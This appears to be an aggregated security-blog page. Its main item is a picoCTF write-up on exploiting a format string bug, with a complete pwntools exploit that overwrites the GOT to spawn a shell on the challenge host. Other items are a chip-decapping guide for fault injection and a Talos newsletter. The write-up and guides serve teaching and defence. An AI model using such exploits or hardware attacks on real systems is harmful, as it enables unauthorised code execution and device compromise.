Google implemented the patch and enforced security for documents loaded by the XSL’s document() function. Assigned CVE: CVE-2023-4357. Reward: $3,000.

Boost Security Audit

Shielder

22 May 2024 at 14:45

TL;DR Shielder, with OSTIF and Amazon Web Services, performed a Security Audit on a subset of the Boost C++ libraries. The audit resulted in five (5) findings ranging from low to medium severity plus two (2) informative notices. The Boost maintainers of the affected libraries addressed some of the issues, while some other were acknowledged as accepted risks. Today, we are publishing the full report in our dedicated repository. Introduction In December 2023, Shielder was hired to perform a Security Audit of Boost, a set of free peer-reviewed portable C++ source libraries.

Yesterday — 23 May 2024Vulnerabily Research

NVISO Labs
Format String Exploitation: A Hands-On Exploration for LinuxWiebe Willems
23 May 2024 at 11:00

Format String Exploitation: A Hands-On Exploration for Linux

NVISO Labs

By: Wiebe Willems

23 May 2024 at 11:00

Format String Exploitation Featurerd Image

Summary

This blogpost covers a Capture The Flag challenge that was part of the 2024 picoCTF event that lasted until Tuesday 26/03/2024. With a team from NVISO, we decided to participate and tackle as many challenges as we could, resulting in a rewarding 130th place in the global scoreboard. I decided to try and focus on the binary exploitation challenges. While having followed Corelan’s Stack & Heap exploitation on Windows courses, Linux binary exploitation was fairly new to me, providing a nice challenge while trying to fill that knowledge gap.

The challenge covers a format string vulnerability. This is a type of vulnerability where submitted data of an input string is evaluated as an argument to an unsafe use of e.g., a printf() function by the application, resulting in the ability to read and/or write to memory. The format string 3 challenge provides 4 files:

The vulnerable binary format-string-3 (download link)
The vulnerable binary source code format-string-3.c (download link)
A C standard library libc.so.6 (download link)
A dynamic linker as the interpreter ld-linux-x86-64.so.2 (download link)

These files are provided to analyze the vulnerability locally, but the goal is to craft an exploit to attack a remote target that runs the vulnerable binary.

The steps of the final exploit:

Fetch the address of the setvbuf function in libc. This is actually provided by the vulnerable binary itself via a puts() function to simulate an information leak printed to stdout,
Dynamically calculate the base address of the libc library,
Overwrite the puts function address in the Global Offset Table (GOT) with the system function address using a format string vulnerability.

For step 2, it’s important to calculate the address dynamically (vs statically/hardcoded) since we can validate that the remote target loads modules at different addresses every time it’s being run. We can verify this by running the binary multiple times, which provides different memory addresses each time it is being run. This is due to the combination of Address Space Layout Randomization (ASLR) and the Position Independent Executable (PIE) compiler flag. The latter can be verified by using readelf on our binary since the binary is provided as part of the challenge.

Interesting resource to learn more about the difference between these mitigations: ASLR/PIE – Nightmare (guyinatuxedo.github.io)

Then, by spawning a shell, we can read and submit the flag file content to solve the challenge.

Vulnerability Details

Background on string formatting

The challenge involved a format string vulnerability, as suggested by its name and description. This vulnerability arises when user input is directly passed and used as arguments to functions such as the C library’s printf() and its variants:

int printf(const char *format, ...)
int fprintf(FILE *stream, const char *format, ...)
int sprintf(char *str, const char *format, ...)
int vprintf(const char *format, va_list arg)
int vsprintf(char *str, const char *format, va_list arg)

Even with input validation in place, passing input directly to one of these functions (think: printf(input)) should be avoided. It’s recommended to use placeholders and string formatting such as printf("%s", input) instead.

The impact of a format string vulnerability can be divided in a few categories:

Ability to read values on the stack
Arbitrary memory reads
Arbitrary memory writes

In the case where arbitrary memory writes are possible, an adversary may obtain full control over the execution flow of the program and potentially even remote code execution.

Background on Global Offset Table

Both the Procedure Linkage Table (PLT) & Global Offset Table (GOT) play a crucial role in the execution of programs, especially those compiled using shared libraries – almost any binary running on a modern system.

The GOT serves as a central repository for storing addresses of global variables and functions. In the current context of a CTF challenge featuring a format string vulnerability, understanding the GOT is crucial. Exploiting this vulnerability involves manipulating the addresses stored in the GOT to redirect program flow.

When an executable is programmed in C to call function and is compiled as an ELF executable, the function will be compiled as function@plt. When the program is executed, it will jump to the PLT entry of function and:

If there is a GOT entry for function, it jumps to the address stored there;
If there is no GOT entry, it will resolve the address and jump there.

An example of the first option, where there is a GOT entry for function, is depicted in the visual below:

PLT & GOT resolving during function calls. — From https://nuc13us.wordpress.com/2015/12/25/hack-using-global-offset-table/

During the exploitation process, our goal is to overwrite entries in the GOT with addresses of our choosing. By doing so, we can redirect the program’s execution to arbitrary locations, such as shellcode or other parts of memory under our control.

Reviewing the source code

We are provided with the following source code:

#include <stdio.h>

#define MAX_STRINGS 32

char *normal_string = "/bin/sh";

void setup() {
	setvbuf(stdin, NULL, _IONBF, 0);
	setvbuf(stdout, NULL, _IONBF, 0);
	setvbuf(stderr, NULL, _IONBF, 0);
}

void hello() {
	puts("Howdy gamers!");
	printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);
}

int main() {
	char *all_strings[MAX_STRINGS] = {NULL};
	char buf[1024] = {'\0'};

	setup();
	hello();	

	fgets(buf, 1024, stdin);	
	printf(buf);

	puts(normal_string);

	return 0;
}

Since we have a compiled version provided from the challenge, we can proceed and make it executable. We then do a test run, which provides the following output:

# Making both the executable & linker executable
chmod u+x format-string-3 ld-linux-x86-64.so.2

# Executing the binary
./format-string-3

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f7c778eb3f0

# This is our input, ending with <enter>
test

test
/bin/sh

Bash

We note a couple of things:

The binary provides us with the memory address of the setvbuf function in the libc library,
We have a way of providing a string as input which is read by the fgets function and printed back in an unsafe manner using printf,
The program finishes with a puts() function call that writes /bin/sh to stdout.

This is hinting towards a memory address overwrite of the puts() function to replace it with the system() function address. As a result, it will then execute system("/bin/sh") and spawn a shell.

Vulnerability #1: Memory Leak

If we take another look at the source code above, we notice the following line in the hello() function:

printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);

Here, the creators of the challenge intentionally leak a memory address to make the challenge easier. If not, we would have to deal with finding an information leak ourselves to bypass Address Space Layout Randomization (ASLR), if enabled.

We can still treat this as an actual information leak that provides us a memory address during runtime. We will use this information to dynamically calculate the base address of the libc library based on the setvbuf function address in the exploitation section below.

Vulnerability #2: Format String Vulnerability

In the test run above we provided a simple test string as input to the program, which was printed back to stdout via the puts(buf) function call. In an excellent paper that can be found here, we learned that we can use format specifiers in C to:

Read arbitrary stack values, using format specifiers such as %x (hexadecimal) or %p (pointers),
Read from arbitrary memory addresses using a combination of %c to move the argument pointer and %s to print the contents of memory starting from an address we specify in our input string,
Write to arbitrary memory addresses by controlling the output counter using %mc, which will increase the output counter with m. Then, we can write the output counter value to memory using %n, again if we provide the memory address correctly as part of our input string.

Even though the source code already indicates that our input is unsafely processed and parsed as an argument for the printf() function, we can verify that we have a format string vulnerability here by providing %p as input, which should read a value as a pointer and print it back to us:

# Executing the binary
./format-string-3

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f2818f423f0

# This is our input, ending with <enter>
%p

# This is the output of the printf(buf) function call
# This now prints back a value as a pointer
0x7f28190a0963
/bin/sh

Bash

The challenge preceding format string 3, called format string 2, actually provided very good practice to get to know format string specifiers and how you can abuse them to read from memory and write to memory. Highly recommended!

Exploitation

We are now armed with an information leak that provides us a memory address and a format string vulnerability. Let’s try and combine these two to get code execution on our remote system.

Calculating input string offset

Before we can really start, there is something we need to address: how do we know where our input string is located in memory once we have sent it to the program? And why does this even matter?

Let’s first have a look at the input AAAAAAAA%2$p. This provides 8 A characters, and then a format specifier to read the 2nd argument to the printf() function, which will, in this case, be a value from memory:

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7fa5ae99b3f0
AAAAAAAA%2$p
AAAAAAAA0xfbad208b
/bin/sh

Bash

Ideally (we’re explaining why later), we have a format specifier %n$p where n is an offset to point exactly at the start of our input string. You can do this manually (%p, %2$p, %3$p…) until %p points to your input string, but I did this using gdb:

# Open the program in gdb
gdb format-string-3

# Put a breakpoint at the puts function
b puts

# Run the program
r

# Continue the program since it will hit the breakpoint 
# on the first puts call in our program (Howdy Gamers !)
c

# Provide our input AAAAAAAA followed by <enter>
AAAAAAAA

Bash

The program should now hit the breakpoint on puts() again, after which we can look at the stack using context_stack 50 to print 50×8 bytes on the stack. You should be able to identify your input string on the 33rd line, which we can easily calculate by dividing the number of bytes by 8:

Calculating offset based on stack line position.

You could assume that 33 is the offset we need, but there’s a catch:

From https://lettieri.iet.unipi.it/hacking/format-strings.pdf:

On 64b systems, the first 5 %lx will print the contents of the rsi, rdx, rcx, r8, and r9, and any additional %lx will start printing successive 8-byte values on the stack.

This means we need to add 5 to our offset to compensate for the 5 registers, resulting in a final offset of 38, as can be seen in the following visual:

Offset calculation arbitrary read — Created using Excalidraw

The offset displayed on top of the visual indicates the relative offset from the start of the stack.

This offset now points exactly to the start of our input string:

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ff5ed4873f0
AAAAAAAA%38$p
AAAAAAAA0x4141414141414141
/bin/sh

Bash

AAAAAAAA is converted to 0x4141414141414141 in hexadecimal since we are printing the input string as a pointer using %p.

Now the (probably) more critical question to understand the answer to: why does it matter that we know how to point to our input string in memory? Up until this point, we have only been reading our own string in memory. What will happen when we replace our %p format specifier to read, to the %n format specifier?

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f4bfd3ff3f0
AAAAAAAA%38$n
zsh: segmentation fault  ./format-string-3

Bash

We get a segmentation fault. What is going on? Our input string now tries to write the value of the output counter to the memory address we were pointing to before with %p, which is… our input string itself.

This means we now have control over where we can write values since we control the input string. We can also modify what we are writing to memory as long as we can control the output counter. We also have control over this, as explained before:

Write to arbitrary memory addresses by controlling the output counter using %mc, which will increase the output counter with m.

By changing the format specifier, we now executed the following:

Offset calculation arbitrary write — Created using Excalidraw

To clearly grasp the concept: if we change our input string to BBBBBBBB, we will now write to 0x4242424242424242 instead, indicating we can control to which memory address we are writing something by modifying our input string.

In this case, we received a segmentation fault since the memory at 0x4141414141414141 is not writeable (page protections, not mapped…). In the next part, we’re going to convert our arbitrary write primitive to effectively do something useful by overwriting an entry in the Global Offset Table.

Local Exploitation

Let’s take a step back and think what we logically need to do. We need to:

Fetch the address of our setvbuf function in the libc library, provided by the program,
From this address, calculate the base address of libc,
Send a format string payload that overwrites the puts function address in the GOT with the system function address in libc,
Continue execution to give control to the operator.

We are going to use the popular pwntools library for Python 3 to help us out quite a bit.

First, let’s attach to our program and print the lines until we hit the libc: output string, then store the memory address in an integer:

from pwn import *

p = process("./format-string-3")

info(p.recvline())              # Fetch Howdy Gamers!
info(p.recvuntil("libc: "))     # Fetch line right before setvbuffer address

# Get setvbuffer address
bytes_setvbuf_address = p.recvline()

# Convert output bytes to integer to store and work with our address
setvbuf_leak = int(bytes_setvbuf_address.split(b"x")[1].strip(),16)
info("Received setvbuf address leak: %s", hex(setvbuf_leak))

Python

### Sample Output
[+] Starting local process './format-string-3': pid 216507
[*] Howdy gamers!
[*] Okay I'll be nice. Here's the address of setvbuf in libc: 
[*] Received setvbuf address leak: 0x7fb19acc83f0
[*] Stopped process './format-string-3' (pid 216507)

Bash

Second, we manually load libc to be able to set its base address to match our (now local, but future remote) target libc base address. We do this by subtracting the setvbuf function address from our manually loaded libc from our leaked function address:

...
libc = ELF("./libc.so.6")
info("Calculating libc base address...")
libc.address = setvbuf_leak - libc.symbols['setvbuf']
info("libc base address: %s", hex(libc.address))

Python

### Sample Output
[+] Starting local process './format-string-3': pid 219013
[*] Howdy gamers!
[*] Okay I'll be nice. Here's the address of setvbuf in libc: 
[*] Received setvbuf address leak: 0x7f25a21de3f0
[*] Calculating libc base address...
[*] libc base address: 0x7f25a2164000
[*] Stopped process './format-string-3' (pid 219013)

Bash

Finally, we can utilize the fmstr_payload function of pwntools to easily write:

What: the system function address in libc
Where: the puts entry in the GOT of our binary

Before actually executing and sending our payload, let’s make sure we understand what’s happening. We start by noting down the addresses of:

the system function address in libc (0x7f852ddca760)
the puts entry in the GOT of our binary (0x404018)

next to the payload we are going to send in an interactive Python prompt, for demonstration purposes:

>>> elf = context.binary = ELF('./format-string-3')
>>> hex(libc.symbols['system'])
'0x7f852ddca760'
>>> hex(elf.got['puts'])
'0x404018'
>>> fmtstr_payload(38, {elf.got['puts'] : libc.symbols['system']})
b'%96c%47$lln%31c%48$hhn%6c%49$hhn%34c%50$hhn%53c%51$hhn%81c%52$hhnaaaabaa\x18@@\x00\x00\x00\x00\x00\x1d@@\x00\x00\x00\x00\x00\x1c@@\x00\x00\x00\x00\x00\x19@@\x00\x00\x00\x00\x00\x1a@@\x00\x00\x00\x00\x00\x1b@@\x00\x00\x00\x00\x00'

Python

You can divide the payload in different blocks, each serving the purpose we expected, although it’s quite a step up from what we’ve manually done before. We can identify the pattern %mc%n$hhn (or ending lln), which:

Increases the output counter with m (note that the output counter does not necessarily start at 0)
Writes the value of the output counter to the address selected by %n$hhn. The first n selects the relevant entry on the stack where our input string memory address is located. The second part, $hhn, resembles our expected %n format specifier, but the double hh is a modifier to truncate the output counter value to the size of a char, thus allowing us to write 1 byte.

Offset calculation precision write — Created using Excalidraw

Let’s now analyze the payload and calculate ourselves for 1 write operation to understand how the payload works. We have %96c%47$lln as the first block of our payload, which can be logically seen as a write operation. This:

Increases the output counter with 96h (hex) or 150d (decimal)
Writes the current value of the output counter (n, truncated by a long long (ll), or 8 bytes, to the memory address specified at offset 42:

As you can see in the payload above, offset 42 will correspond with \x18@@\x00\x00\x00\x00\x00, which is further down our payload. @ is \x40 in hex, so our target address matches the value for the puts entry in the GOT if we swap the endianness: \x00\x00\x00\x00\x00\x40\x40\x18, or 0x404018. This clearly indicates we are writing to the correct memory location, as expected.

You’ll notice that aaaabaa is also part of our payload: this serves as padding to correctly align our payload to have 8-byte addresses on the stack. The start of an offset on the stack should contain exactly the start of our 8-byte memory address to write to, since we’re working on a 64-bit system. If no padding is present, a reference to an offset would start in the middle of a memory address.

After writing, the payload will continue with processing the next block %31c%48$hhn, which again increases the output counter and writes to the next offset (43). This offset contains our next address. The payload will continue until 6 blocks are executed, which corresponds to 6 %…%n statements.

Now that we understand the payload, we load the binary using ELF and send our payload to our target process, after which we give interactive control to the operator:

...
elf = context.binary = ELF('./format-string-3')
info("Creating format string payload...")
payload = fmtstr_payload(38, {elf.got['puts'] : libc.symbols['system']})

# Ready to send payload!
info("Sending payload...")
p.sendline(payload)
p.clean()

# Give control to the shell to the operator
info("Payload successfully sent, enjoy the shell!")
p.interactive()

Python

The fmtstr_payload function really does a lot of heavy lifting for us combined with the elf and libc references. It effectively writes the complete address of libc.symbols[‘system’] to the location where elf.got[‘puts’] originally was in memory by precisely modifying the output counter and executing memory write operations.

### Sample Output
[+] Starting local process './format-string-3': pid 227263
[*] Howdy gamers!
[*] Okay I'll be nice. Here's the address of setvbuf in libc: 
[*] Received setvbuf address leak: 0x7fa7c29473f0
[*] '/home/kali/picoctf/libc.so.6'
[*] Calculating libc base address...
[*] libc base address: 0x7fa7c28cd000
[*] '/home/kali/picoctf/format-string-3'
[*] Creating format string payload...
[*] Sending payload...
[*] Payload successfully sent, enjoy the shell!
[*] Switching to interactive mode
$ whoami
kali

Bash

We successfully exploited the format string vulnerability and called system('/bin/sh'), resulting in an interactive shell!

Remote Exploitation

Switching to remote exploitation is trivial in this challenge, since we can simply reuse the local files to do our calculations. Instead of attaching to a local process using p = process("./format-string-3"), we substitute this by connecting to a remote target:

# Define remote targets
target_host = "rhea.picoctf.net"
target_port = 62200

# Connect to remote process
p = remote(target_host, target_port)

Python

Note that you’ll need to substitute the port that is provided to you after launching the instance on the picoCTF platform.

### Sample Output
...
[*] Payload successfully sent, enjoy the shell!
[*] Switching to interactive mode
$ ls flag.txt
flag.txt

Python

That concludes the exploit, after which we can submit our flag. In a real world scenario, getting this kind of remote code execution would clearly be a great risk.

Conclusion

The preceding challenges that lead up to this challenge (format string 0, 1, 2) proved to be a great help in understanding format string vulnerabilities and how to exploit them. Since Linux exploitation is a new topic to me, this was a great way to practice these types of vulnerabilities during a fun event.

Format string vulnerabilities are less common than they used to be, however, our IoT colleagues assured me they encountered some recently during an IoT device assessment.

That’s why it’s important to adhere to:

Input Validation
Limit User-Controlled Input
Enable (or pay attention to already enabled) compiler warnings for format string vulnerabilities
Secure Coding Practices

This should greatly limit the risk of format string vulnerabilities still being present in current day applications.

References

PicoGym: https://play.picoctf.org/practice
Hack using Global Offset Table: https://nuc13us.wordpress.com/2015/12/25/hack-using-global-offset-table/
Format Strings Paper from Universita di Pisa: https://lettieri.iet.unipi.it/hacking/format-strings.pdf
Format Specifiers in C: https://unstop.com/blog/format-specifiers-in-c

About the author

Wiebe Willems

Wiebe Willems is a Cyber Security Researcher active in the Research & Development team at NVISO. With his extensive background in Red & Purple Teaming, he is now driving the innovation efforts of NVISO’s Red Team forward to deliver even better advisory to its clients.

Wiebe honed his skills by getting certifications for well-known Red Teaming trainings, next to taking deeply technical courses about stack & heap exploitation.

Zero Day Initiative - Blog
MindShaRE: Decapping Chips for Electromagnetic Fault Injection (EMFI)Dmitry Janushkevich
23 May 2024 at 16:19

MindShaRE: Decapping Chips for Electromagnetic Fault Injection (EMFI)

Zero Day Initiative - Blog

By: Dmitry Janushkevich

23 May 2024 at 16:19

Recently, the automotive VR team has undertaken an effort to reproduce the software extraction attack against one of the target devices used during the Automotive Pwn2Own 2024 held in Tokyo, Japan. The electromagnetic fault injection (EMFI) approach was chosen to attempt an attack against the existing readout protection mechanisms. This blog post details preparatory steps to speed up the attack, hopefully considerably.

Electromagnetic fault injection

In general, fault injection attacks against hardware attempt to produce some sort of gain for an attacker by injecting faults into a device under attack by manipulating clock pulses, supply voltages, temperature, electromagnetic fields around the device, and aiming short light pulses at certain locations on the device. Of these vectors, EMFI stands out as probably the only attack approach that requires close to no modifications of the device under attack, with all action being conducted at a quite short distance. The attack then proceeds by moving an EM probe above the device in very small increments and triggering an EM pulse. With any luck, this would disturb the normal operation of the device under attack in just the right way to cause the desired effect.

Practically speaking, some sort of an EM pulse tool is required to conduct the attack. In this case, the PicoEMP was chosen for that purpose, which has been mounted on a modified 3D printer carriage.

However, the device in question (a GD32F407Z by GigaDevice) is physically rather large, with the package measuring 20mm by either side. Considering how long each individual attempt runs, the fact that the attempt needs to be retried multiple times to collect meaningful outcome statistics, and rather small increments used to move the probe, it would make sense to narrow down the search area as much as possible. Injecting EM faults into the epoxy encapsulation would not bring much of an effect.

Decapping

Unfortunately, the encapsulation is not transparent and does not allow for easy visual identification of the die in the package. This means that some way of getting the die out is required to measure it, or better yet, leave the die in the package so it will be possible to measure both the die dimensions and the position of the die within the package.

There are multiple approaches to decapsulation, or decapping for short:

·      Mechanical: sanding or milling the package, cracking the encapsulation when heated
·      Chemical: applying acid to dissolve encapsulation
·      Thermal: placing the package in a furnace to burn encapsulation away
·      Optical: using a laser to burn encapsulation away in a precise manner

Of these, many require specialized equipment (mill, laser, furnace, fume hood for nitric acid), are time-consuming (sanding), or do not preserve important information (cracking the package). The choice was thus limited to what was available: hot sulfuric acid.

DANGER: Hot sulfuric acid is extremely corrosive; avoid spilling and wear proper PPE at all times.

DANGER: Sulfuric acid vapors are extremely corrosive; avoid inhaling and work in a well-ventilated area (fume hood or outside).

NOTE: Study relevant safety information including but not limited to materials handling, spill containment, and clean-up procedures before working with any hazardous chemicals.

NOTE: This blog post was written purely for educational purposes; any attempts to replicate the work are at your own risk.

Decapping process

As my home lab is, sadly, not equipped with a fume hood, all work was conducted outside.

The following tools were used:

·      Sulfuric acid, 96%
·      A heat source in the form of a hot air station
·      A crocodile clip “helping hands”
·      A squirt bottle with acetone
·      A PE pipette
·      A waste container.

To begin, the device under attack is fixed in the clip, and a small drop of acid was applied with the pipette in the package center.

The device was then heated using the hot air station set to 200°C and a moderate air flow of around 40%. The aim of this process is to slowly dissolve the packaging epoxy. The device was heated until some fuming was observed from the drop and stopped before any bubbling would occur. If the acid gets hot enough to produce bubbles, the material will form a hard carbonized “cake” which will be problematic to remove. Unfortunately, this has been a problem before.

After the acid visibly darkened, which should take around 1 minute +- 50%, the heating was stopped, and the device was allowed to cool down somewhat. Then, the acid was washed off with acetone into the waste container. The device then was dried off with hot air to remove moisture.

The process was then repeated multiple times, with each iteration removing a bit of the packaging material. This was captured in the following series of images (more steps were taken than is presented here):

*Figure 4 - Time lapse of decapping process*

A stack of dice slowly emerged from the package: the larger one is the microcontroller itself, and the smaller one is the serial Flash memory holding all the programmed code and data. Unfortunately, the current process does not preserve the bond wires, rendering the device inoperable. Its operation was not required in our case. This could possibly be mitigated by using a 98% acid and anhydrous acetone – something to attempt in the future.

Measurements

The end result of the decapping process is pictured below.

Using a graphics editor, it is possible to take measurements in pixels of the package, the die, and the die positioning. This came out to be the following:

·      Package size 1835x1835 pixels (measured) = 20x20 mm (known from the datasheet)
·      Pixels per mm: 91.75
·      Die size 366x366 pixels (measured) = 4x4mm (computed)
·      Die offset from bottom left: 745x745 pixels (measured) = 8.12x8.12mm (computed)

The obtained numbers are immediately useful to program the EM probe motion restricted to the die area only. To find out how much experiment time this could save, let’s compute the areas: 4x4 = 16 mm2 for the die itself, and 20x20 = 400 mm2 for the whole package. This is 25 times decrease in the area and thus the experiment time.

Another approach that could avoid the decapping process is moving the probe in a spiral fashion, starting from the package center and moving outwards. This is of course possible to implement. However, the challenge here is the possibility of the two dice getting packaged side-to-side instead of being stacked like in this example – this would severely decrease the gain from this approach. Given the decapping only takes no more than 1-2 hours including cleanup, this was deemed well worth the information gained – and the die pictures obtained.

Conclusion

I hope you enjoyed this brief tutorial. Again, please take caution when using sulfuric acid or any other corrosive agents. Please dispose of waste materials responsibly. The world of hardware hacking offers many opportunities for discovery. We’ll continue to post guides and methodologies in future posts. Until then, you can follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.

MindShaRE: Decapping Chips for Electromagnetic Fault Injection (EMFI)

Cisco Talos
Apple and Google are taking steps to curb the abuse of location-tracking devices — but what about others?Jonathan Munshaw
23 May 2024 at 18:00

Apple and Google are taking steps to curb the abuse of location-tracking devices — but what about others?

Cisco Talos

By: Jonathan Munshaw

23 May 2024 at 18:00

Since the advent of products like the Tile and Apple AirTag, both used to keep track of easily lost items like wallets, keys and purses, bad actors and criminals have found ways to abuse them.

These adversaries can range from criminals just looking to do something illegal for a range of reasons, but maybe just looking to steal a physical object, to just a jealous or suspicious spouse or partner who wants to keep tags on their significant other.

Apple and other manufacturers who make these devices have since taken several steps to curb the abuse of these devices and make them more secure. Most recently, Google and Apple announced new alerts that would hit Android and iOS devices and alert users that their devices’ location is being connected to any location-tracking device.

“With this new capability, users will now get an ‘[Item] Found Moving With You’ alert on their device if an unknown Bluetooth tracking device is seen moving with them over time, regardless of the platform the device is paired with,” Apple stated in its announcement.

Companies Motorola, Jio and Eufy also announced that they would be adhering to these new standards and should release compliant products soon.

Certainly, products like the AirTag and Samsung trackers that these companies have direct control over will now be more secure, and hopefully less ripe for abuse by a bad actor, but it’s far from a total solution to the problem that these types of products pose.

As I’ve pointed out in the past with security cameras and any other range of internet-connected devices, online stores are filled with these types of products, promising to track users’ personal items with an app so they don’t lose common household items like their phones, wallets and keys.

Amazon has countless listings under “location tag” for a range of AirTag-like products made by unknown manufacturers. Some of these products are slim enough to fit right into the credit card pocket of a wallet or purse, and others are smaller than the average AirTag and even advertise that they can remain hidden inside a car.

I admittedly haven’t been able to dive into these individual devices, but some of them come with their own third-party apps, which come with their own set of security caveats and completely take it out of platform developers’ hands.

There are also other “find my device”-type services that pose additional security concerns outside of just buying a small tag. Android’s new, enhanced “Find My Device” network is a crowdsourced solution to help users potentially find their lost devices, similar to iOS’ Find My network.

The Find My Device network works by using other Android devices to silently relay the registered device’s approximate location, even if the device being searched for is offline or turned off. In the wrong hands, there are a range of ways that can be abused on its own.

So, rather than relying on developers and manufacturers to make these services more secure, I have a few tips for how to use AirTag-like devices safely, if you really can’t come up with a better solution for not losing your keys.

Check for suspicious tracking devices. On iOS, this means opening the “Find My” app and navigating to Items > Items Detected Near You. Any unfamiliar AirTags will be listed here. On Android, you can do the same thing by going to Settings > Safety & Emergency > Unknown Tracker Alerts > Scan Now.
Remove yourself from any “Sharing Groups” unless it’s a trusted contact in your phone using the Find My app on iOS.
If location tracking is your primary concern (especially for parents and their children) using the Find My app on iOS and Android is generally a more secure option than trusting a third-party app downloaded from the app store or relying on a Bluetooth connection.
Manage individual apps’ settings to ensure only the services that *really* need to track your device’s physical location are using it. (Ex., you probably don’t need Facebook tracking that information.)
Since AirTags are connected to your Apple ID, ensure that login is secured with multi-factor authentication (MFA) or using a passkey.

The one big thing

Cisco recently developed and released a new feature to detect brand impersonation in emails when adversaries pretend to be a legitimate corporation. Threat actors employ a variety of techniques to embed brand logos within emails. One simple method involves inserting words associated with the brand into the HTML source of the email. New data from Talos found that popular brands like PayPal, Microsoft, NortonLifeLock and McAfee are among some of the most-impersonated brands in these types of phishing emails.

Why do I care?

So now what?

Well-known brands can protect themselves from this type of threat through asset protection as well. Domain names can be registered with various extensions to thwart threat actors attempting to use similar domains for malicious purposes. The other crucial step brands can take is to conceal their information from WHOIS records via privacy protection. And users who want to learn more about Cisco Secure Email Threat Defense's new brand impersonation detection tools can visit this site.

Top security headlines of the week

Adversaries have been quietly exploiting the backbone of cellular communications to track Americans’ location for years, according to a U.S. Cybersecurity and Infrastructure Security Agency (CISA). The official broke ranks with their agency and reportedly shared this information with the Federal Communications Commission (FCC). The official said that attackers have used vulnerabilities in the SS7 protocol to steal location data, monitor voice and text messages, and deliver spyware. Other targets have received text messages containing fake news or disinformation. SS7 is the protocol used across the globe that routes text messages and calls to different devices but has often been a target for attackers. In the past, other vulnerabilities in SS7 have been used to gain access to telecommunications providers’ networks. In their written comments to the FCC, the official said that these vulnerabilities are the “tip of the proverbial iceberg” of SS7-related exploits used against U.S. citizens. (404 Media, The Economist)

The FBI once again seized the main site belonging to BreachForums, a popular platform for buying and selling stolen personal information. Last year, international law enforcement agencies took down a previous version of the cybercrime site and arrested its administrator, but the new pages quickly emerged, using three different domains since the last disruption. American law enforcement agencies also took control of the forum’s official Telegram account, and a channel belonging to the newest BreachForums administrator, “Baphomet.” However, the FBI has yet to publicly state anything about the takedown or any potential arrests. BreachForums isn’t expected to be gone for long, as another admin named “ShinyHunters” claims the site will be back with a new Onion domain soon. ShinyHunters claims they’ve retried access to the seized clearnet domain for BreachForums, though they did not provide specific methods. BreachForums is infamous for being a site where attackers can buy and sell stolen data, offer their hacking services or share recent TTPs. (TechCruch, HackRead)

The U.S. Department of Justice charged three North Koreans with crimes related to impersonating others to obtain remote employment in the U.S., which in turn generated funding for North Korea’s military. The three men, and another U.S. citizen, were charged with what the DOJ called “staggering fraud” in which they secured illicit work with several U.S. companies and government agencies using fraudulent identities from 60 real Americans. The U.S. citizen was allegedly placed laptops belonging to U.S. companies at various residences so the North Koreans could hide their true location. North Korean state-sponsored actors have used these types of tactics for years, often relying on social media networks like LinkedIn to fake their personal information and obtain jobs or steal sensitive information from companies. More than 300 companies may have been affected, with the perpetrators earning more than $6.8 million, most of which was used to “raise revenue for the North Korean government and its illicit nuclear program,” according to the DOJ. (ABC News, Bloomberg)

Can’t get enough Talos?

Upcoming events where you can find Talos

ISC2 SECURE Europe (May 29)

Amsterdam, Netherlands

Gergana Karadzhova-Dangela from Cisco Talos Incident Response will participate in a panel on “Using ECSF to Reduce the Cybersecurity Workforce and Skills Gap in the EU.” Karadzhova-Dangela participated in the creation of the EU cybersecurity framework, and will discuss how Cisco has used it for several of its internal initiatives as a way to recruit and hire new talent.

Cisco Live (June 2 - 6)

Las Vegas, Nevada

Bill Largent from Talos' Strategic Communications team will be giving our annual "State of Cybersecurity" talk at Cisco Live on Tuesday, June 4 at 11 a.m. Pacific time. Jaeson Schultz from Talos Outreach will have a talk of his own on Thursday, June 6 at 8:30 a.m. Pacific, and there will be several Talos IR-specific lightning talks at the Cisco Secure booth throughout the conference.

AREA41 (June 6 – 7)

Zurich, Switzerland

Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the primordial importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches.

Most prevalent malware files from Talos telemetry over the past week

SHA 256: 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202
MD5: e4acf0e303e9f1371f029e013f902262
Typical Filename: FileZilla_3.67.0_win64_sponsored2-setup.exe
Claimed Product: FileZilla
Detection Name: W32.Application.27hg.1201

SHA 256: a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0
MD5: b4440eea7367c3fb04a89225df4022a6
Typical Filename: Pdfixers.exe
Claimed Product: Pdfixers
Detection Name: W32.Superfluss:PUPgenPUP.27gq.1201

SHA 256: 1fa0222e5ae2b891fa9c2dad1f63a9b26901d825dc6d6b9dcc6258a985f4f9ab
MD5: 4c648967aeac81b18b53a3cb357120f4
Typical Filename: yypnexwqivdpvdeakbmmd.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Scar::1201

SHA 256: d529b406724e4db3defbaf15fcd216e66b9c999831e0b1f0c82899f7f8ef6ee1
MD5: fb9e0617489f517dc47452e204572b4e
Typical Filename: KMSAuto++.exe
Claimed Product: KMSAuto++
Detection Name: W32.File.MalParent

SHA 256: abaa1b89dca9655410f61d64de25990972db95d28738fc93bb7a8a69b347a6a6
MD5: 22ae85259273bc4ea419584293eda886
Typical Filename: KMSAuto++ x64.exe
Claimed Product: KMSAuto++
Detection Name: W32.File.MalParent

Normal view

Brand logo embedding and delivery techniques

The scope of brand impersonation

Protect against brand impersonation

Strengthening the weakest link

Asset protection

Advanced detection methods

XSL

XSL and Remote Content

XML External Entities

XInclude

XLS’s <xsl:import> and <xsl:include> tags

XLS’s document() function

XXE

Other Tests

POCs

The Bounty

Safari

Chrome

Links

Summary

Vulnerability Details

Background on string formatting

Background on Global Offset Table

Reviewing the source code

Vulnerability #1: Memory Leak

Vulnerability #2: Format String Vulnerability

Exploitation

Calculating input string offset

Local Exploitation
